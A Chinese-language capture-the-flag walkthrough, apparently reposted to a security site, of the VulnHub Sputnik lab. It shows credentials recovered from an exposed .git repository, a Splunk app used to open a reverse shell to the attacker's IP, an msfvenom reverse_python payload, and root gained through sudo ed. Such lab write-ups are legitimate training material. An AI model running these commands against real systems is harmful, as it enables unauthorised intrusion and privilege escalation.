vulnhub之Sputnik的实践

admin 2025年1月13日15:39:20评论9 views字数 1249阅读4分9秒阅读模式

本周实践的是vulnhub的Sputnik镜像,

下载地址,https://download.vulnhub.com/sputnik/Sputnik.ova,

用virtualbox导入成功,

做地址扫描,sudo netdiscover -r 192.168.31.0/24,

获取到靶机地址是192.168.31.246,

继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.31.246,
获取到两个后面需要用到的信息,
192.168.31.246:55555/.git和61337/tcp  open  http Splunkd,
vulnhub之Sputnik的实践
浏览器访问http://192.168.31.246:55555/.git,获取到一些目录文件,
vulnhub之Sputnik的实践
进到logs目录,获取到https://github.com/ameerpornillos/flappy.git
vulnhub之Sputnik的实践
在kali攻击机上把项目clone下来,
git clone https://github.com/ameerpornillos/flappy,
进入目录,查看日志,git log,
vulnhub之Sputnik的实践
发现了07fda135aae22fa7869b3de9e450ff7cacfbc717,
vulnhub之Sputnik的实践
继续查看详细信息,
git ls-tree 07fda135aae22fa7869b3de9e450ff7cacfbc717,
获取到f4385198ce1cab56e0b2a1c55e8863040045b085,
查看内容,
git show f4385198ce1cab56e0b2a1c55e8863040045b085,
获取到用户名密码,sputnik:ameer_says_thank_you_and_good_job,
vulnhub之Sputnik的实践
用上面获取到的用户名密码登录http://192.168.31.246:61337,
vulnhub之Sputnik的实践
下载app,https://github.com/TBGSecurity/splunk_shells/archive/1.2.tar.gz,上传到splunk,
vulnhub之Sputnik的实践
重新启动splunk,
vulnhub之Sputnik的实践
重新访问确实上传成功,
vulnhub之Sputnik的实践
修改权限,
vulnhub之Sputnik的实践
kali攻击机上开启反弹shell监听,nc -lvp 4444,
在splunk搜索里执行| revshell std 192.168.31.211 4444,
vulnhub之Sputnik的实践
获取到反弹shell,
vulnhub之Sputnik的实践
在kali攻击机上制作新的反弹shell命令,
msfvenom -p cmd/unix/reverse_python lhost=192.168.31.211 lport=4455 R,
新开启一个反弹shell监听,nc -lvp 4455,
在靶机上执行命令,
vulnhub之Sputnik的实践
获取到新的反弹shell,
转成交互式shell,python -c 'import pty;pty.spawn("/bin/bash")',
查看root权限,sudo -l,获取到/bin/ed,
去GTFOBins搜提权方法,
vulnhub之Sputnik的实践
提权,sudo ed,!/bin/sh,id确认是root,
vulnhub之Sputnik的实践

原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之Sputnik的实践

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月13日15:39:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之Sputnik的实践http://cn-sec.com/archives/3624347.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息